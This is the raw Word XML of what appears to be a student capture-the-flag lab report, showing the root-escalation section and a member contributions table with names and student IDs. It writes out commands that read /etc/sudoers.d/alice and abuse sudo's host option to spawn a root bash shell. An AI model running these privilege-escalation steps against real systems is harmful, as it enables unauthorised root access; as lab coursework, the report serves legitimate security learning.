    <w:p w14:paraId="59AFDB37" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3871B2EB" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C97C59C" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4757BBC9" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748A4D5D" w14:textId="0D45BC5C" w:rsidR="00DE101F" w:rsidRDefault="00DE101F" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Root Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C76E2" w14:textId="453642F1" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="001620A6">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Members Involved</w:t>
      </w:r>
      <w:r>
        <w:t>: Ahmad Danial Bin Ahmad Fauzi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9AC6B" w14:textId="3389DEBB" w:rsidR="001620A6" w:rsidRPr="007155E4" w:rsidRDefault="001620A6" w:rsidP="001620A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SSH,</w:t>
      </w:r>
      <w:r w:rsidR="00957AEE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088696D" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="001620A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Thought Process and Methodology and Attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6C765" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3F91AC" w14:textId="29E0886D" w:rsidR="00823253" w:rsidRPr="00FC0622" w:rsidRDefault="00823253" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Next, Ahmad Danial Bin Ahmad Fauzi proceed to find “alice” since the other users contain usernames as their directory but on his first try, the permission was denied. Then, he went back and recheck his notes that he copied down from 25 Days of Cyber and he remembered that he have to add another line of commands in order to gain permission from the administator. So, he ran find </w:t>
      </w:r>
      <w:r w:rsidRPr="00823253">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">“/ </w:t>
      </w:r>
      <w:r w:rsidR="005035A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00823253">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>name *alice* -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” to find out that he “Alice” directory is inside the directory called “</w:t>
      </w:r>
      <w:r w:rsidR="00FC0622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>/etc/sudoers.d/</w:t>
      </w:r>
      <w:r w:rsidR="00FC0622">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>”. He decided to open the directory by ”</w:t>
      </w:r>
      <w:r w:rsidR="00FC0622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>cat /etc/sudoers.d/alice</w:t>
      </w:r>
      <w:r w:rsidR="00FC0622">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” to check the contents inside. Then he saw the hostname and the host password for the root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B88047" w14:textId="3FB281FB" w:rsidR="0071224A" w:rsidRDefault="00980252" w:rsidP="00823253">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E314F9A" wp14:editId="4C16AEE6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-2295660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2732180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="1800"/>
                <wp:effectExtent l="38100" t="57150" r="57150" b="55880"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="Ink 33"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId23">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="360" cy="1800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="5D22AA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181.45pt;margin-top:214.45pt;width:1.45pt;height:1.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">
                <v:imagedata r:id="rId24" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00823253" w:rsidRPr="00823253">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28513BE9" wp14:editId="733E4937">
            <wp:extent cx="3113574" cy="2771775"/>
            <wp:effectExtent l="76200" t="76200" r="67945" b="666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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3117443" cy="2775219"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="57150">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55760078" w14:textId="224CDC0D" w:rsidR="0071224A" w:rsidRPr="00325443" w:rsidRDefault="00FC0622" w:rsidP="00FC0622">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>In order to get into the root, Ahmad Danial ran “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>sudo -h ssalg-gnikool /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” because -h translates to host=host</w:t>
      </w:r>
      <w:r w:rsidR="00325443">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> and it grants the user run command on host. He finally abused into the root section and he went into the root directory to list out the contents in order to find any hidden files. The challenge require us to find the root flag, so he opened the </w:t>
      </w:r>
      <w:r w:rsidR="00325443">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>“root.txt</w:t>
      </w:r>
      <w:r w:rsidR="00325443">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” file and finally got our final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B44810" w14:textId="79A2B470" w:rsidR="0071224A" w:rsidRDefault="00FC0622" w:rsidP="00FC0622">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0622">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07978D98" wp14:editId="0F0C4E7C">
            <wp:extent cx="2257425" cy="1353527"/>
            <wp:effectExtent l="76200" t="76200" r="66675" b="755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1211" cy="1361793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="44450">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE2365" w14:textId="1BAAA8DD" w:rsidR="002359B1" w:rsidRPr="00325443" w:rsidRDefault="00325443">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Final Results: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>We successfully retrieve two flags but we didn’t manage to use metasploit, linpeas and etc. because it is quite complicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B001AFC" w14:textId="41B82EEB" w:rsidR="002359B1" w:rsidRPr="002359B1" w:rsidRDefault="002359B1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002359B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contributions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232F2BC" w14:textId="37A0B302" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:r>
        <w:t>At the end of the report, attach a table briefly mentioning each member’s role and contribution:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1332"/>
        <w:gridCol w:w="2431"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="3111"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA6EF3" w14:paraId="3D70DDED" w14:textId="471CE47D" w:rsidTr="00325443">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29DEE0A7" w14:textId="67209D73" w:rsidR="002359B1" w:rsidRDefault="002359B1" w:rsidP="007155E4">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="665D1EF0" w14:textId="6945310C" w:rsidR="002359B1" w:rsidRDefault="002359B1" w:rsidP="007155E4">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D78C6D7" w14:textId="7DE09CB9" w:rsidR="002359B1" w:rsidRDefault="002359B1" w:rsidP="007155E4">
            <w:r>
              <w:t>Contribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A765851" w14:textId="7C829022" w:rsidR="002359B1" w:rsidRDefault="002359B1" w:rsidP="007155E4">
            <w:r>
              <w:t>Signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6EF3" w14:paraId="2691AFBF" w14:textId="6926EB26" w:rsidTr="00325443">
        <w:trPr>
          <w:trHeight w:val="645"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DFEB34D" w14:textId="7833D3C7" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>1211101376</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F316186" w14:textId="615DFC68" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>Isaiah Wong Terjie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44770F45" w14:textId="3D2C0289" w:rsidR="00325443" w:rsidRDefault="00FA0FF3" w:rsidP="00325443">
            <w:r>
              <w:t>Solved the initial foothold, shorten up the reverse shell and then pivoted from Tweedledum to Humpty Dumpty to Alice. Did most of the write ups.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1517F4D6" w14:textId="072B5A92" w:rsidR="00325443" w:rsidRDefault="00980252" w:rsidP="00325443">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpi">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="253E4671" wp14:editId="026A2519">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>389835</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>147285</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="746640" cy="736560"/>
                      <wp:effectExtent l="38100" t="57150" r="53975" b="45085"/>
                      <wp:wrapNone/>
                      <wp:docPr id="32" name="Ink 32"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                          <w14:contentPart bwMode="auto" r:id="rId27">
                            <w14:nvContentPartPr>
                              <w14:cNvContentPartPr/>
                            </w14:nvContentPartPr>
                            <w14:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="746640" cy="736560"/>
                            </w14:xfrm>
                          </w14:contentPart>
                        </a:graphicData>
                      </a:graphic>
                    </wp:anchor>
                  </w:drawing>
                </mc:Choice>
                <mc:Fallback>
                  <w:pict>
                    <v:shape w14:anchorId="05623CEB" id="Ink 32" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:30pt;margin-top:10.9pt;width:60.25pt;height:59.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">
                      <v:imagedata r:id="rId28" o:title=""/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6EF3" w14:paraId="7E726367" w14:textId="53187C06" w:rsidTr="00325443">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E0FF885" w14:textId="06B2D579" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>1211101321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BDE0C2" w14:textId="3CBE9BD3" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>Muhammad Zafran Bin Mohd Anuar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60642F2B" w14:textId="505D5C7C" w:rsidR="00325443" w:rsidRDefault="00FA0FF3" w:rsidP="00325443">
            <w:r>
              <w:t>Did the recon and enumeration to gather information for the group.</w:t>
            </w:r>
            <w:r w:rsidR="00980252">
              <w:t xml:space="preserve"> As well as deciphering the texts.</w:t>
            </w:r>
            <w:r w:rsidR="00325443">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D5ADA8D" w14:textId="3011316B" w:rsidR="00325443" w:rsidRDefault="00AA6EF3" w:rsidP="00325443">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792D83A0" wp14:editId="1CEC8B4E">
                  <wp:extent cx="1779492" cy="8667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98991" cy="876273"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6EF3" w14:paraId="2EEC6D64" w14:textId="517F5466" w:rsidTr="00325443">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="055C5E02" w14:textId="240E345C" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>1211100857</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438F224E" w14:textId="7D4200E0" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>Javier Austin Anak Jawa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6523F149" w14:textId="538BC30F" w:rsidR="00325443" w:rsidRDefault="00FA0FF3" w:rsidP="00325443">
            <w:r>
              <w:t>Did the recon and enumeration to gather information for the group. Successfully retrieve the user flag.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD5AC97" w14:textId="4781F8DA" w:rsidR="00325443" w:rsidRDefault="00AA6EF3" w:rsidP="00325443">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167DB8F3" wp14:editId="75788967">
                  <wp:extent cx="1695450" cy="9758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13029" cy="985951"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6EF3" w14:paraId="5CA4FB4A" w14:textId="4C4AE709" w:rsidTr="00325443">
        <w:trPr>
          <w:trHeight w:val="72"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F2D5013" w14:textId="745D8F6D" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>1211100824</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4865ABF7" w14:textId="717986A2" w:rsidR="00325443" w:rsidRDefault="00325443" w:rsidP="00325443">
            <w:r>
              <w:t>Ahmad Danial Bin Ahmad Fauzi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F82EC02" w14:textId="08A61612" w:rsidR="00325443" w:rsidRDefault="00980252" w:rsidP="00325443">
            <w:r>
              <w:t>Did the root escalation and found a way into hidden directories.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="708E175D" w14:textId="048FC0BC" w:rsidR="00325443" w:rsidRDefault="006F44C2" w:rsidP="00325443">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E1AA44" wp14:editId="014DAE80">
                  <wp:extent cx="1838325" cy="86719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57148" cy="876074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68B92930" w14:textId="1E61E1F5" w:rsidR="007155E4" w:rsidRDefault="002359B1">
      <w:r>
        <w:t>NOTE: IT IS IMPORTANT EACH MEMBER CONTRIBUTES IN SOME WAY AND ALL MEMBERS MUST SIGN TO ACKNOWLEDGE THE CONTRIBUTIONS! DO NOT GIVE FREELOADERS THE FLAGS AS THEY DON’T DESERVE THE MARKS. DO NOT SHARE THE FLAGS WITH OTHER GROUPS AS WELL!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35312C4E" w14:textId="4FE3D08E" w:rsidR="002359B1" w:rsidRDefault="002359B1">
      <w:r>
        <w:t>Attach the video link at the end of the report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215E3EE" w14:textId="7845CA7D" w:rsidR="002359B1" w:rsidRDefault="002359B1">
      <w:r>
        <w:t xml:space="preserve">VIDEO LINK: </w:t>
      </w:r>
      <w:r w:rsidR="00320987" w:rsidRPr="00320987">
        <w:t>https://youtu.be/NDvHWdo-n_8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762820E3" w14:textId="2F5B3985" w:rsidR="002359B1" w:rsidRDefault="002359B1"/>
    <w:p w14:paraId="59BA7BA8" w14:textId="77777777" w:rsidR="00FA0FF3" w:rsidRDefault="00FA0FF3"/>
    <w:sectPr w:rsidR="00FA0FF3">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77B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="233C1258"/>
    <w:lvl w:ilvl="0" w:tplc="F6BAD14E">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2170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24E5"/>
    <w:rsid w:val="00031663"/>
    <w:rsid w:val="00034B05"/>
    <w:rsid w:val="001430EF"/>
    <w:rsid w:val="001620A6"/>
    <w:rsid w:val="002359B1"/>
    <w:rsid w:val="00243F33"/>
    <w:rsid w:val="00267DA2"/>
    <w:rsid w:val="00320987"/>
    <w:rsid w:val="00325443"/>
    <w:rsid w:val="00396EDE"/>
    <w:rsid w:val="003A0756"/>
    <w:rsid w:val="003A49E6"/>
    <w:rsid w:val="005035A7"/>
    <w:rsid w:val="00590376"/>
    <w:rsid w:val="005D70C9"/>
    <w:rsid w:val="006024E5"/>
    <w:rsid w:val="0061269A"/>
    <w:rsid w:val="0065454A"/>
    <w:rsid w:val="00696548"/>
    <w:rsid w:val="006F44C2"/>
    <w:rsid w:val="0071224A"/>
    <w:rsid w:val="007155E4"/>
    <w:rsid w:val="00767827"/>
    <w:rsid w:val="007826CD"/>
    <w:rsid w:val="00823253"/>
    <w:rsid w:val="00880C15"/>
    <w:rsid w:val="008C2E42"/>
    <w:rsid w:val="00902C72"/>
    <w:rsid w:val="00957AEE"/>
    <w:rsid w:val="00975083"/>
    <w:rsid w:val="009760C0"/>
    <w:rsid w:val="00980252"/>
    <w:rsid w:val="009E160F"/>
    <w:rsid w:val="00A70C98"/>
    <w:rsid w:val="00A778B0"/>
    <w:rsid w:val="00AA6EF3"/>
    <w:rsid w:val="00C750CB"/>
    <w:rsid w:val="00CA1D40"/>
    <w:rsid w:val="00D01647"/>
    <w:rsid w:val="00D3632C"/>
    <w:rsid w:val="00DE101F"/>
    <w:rsid w:val="00F87103"/>
    <w:rsid w:val="00FA0FF3"/>
    <w:rsid w:val="00FC0622"/>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49AFB"/>
  <w15:docId w15:val="{66A252D6-57A6-4209-B568-16577F2E0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7155E4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00715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96548"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A778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394586">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1868058193">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1940522084">
              <w:marLeft w:val="0"/>
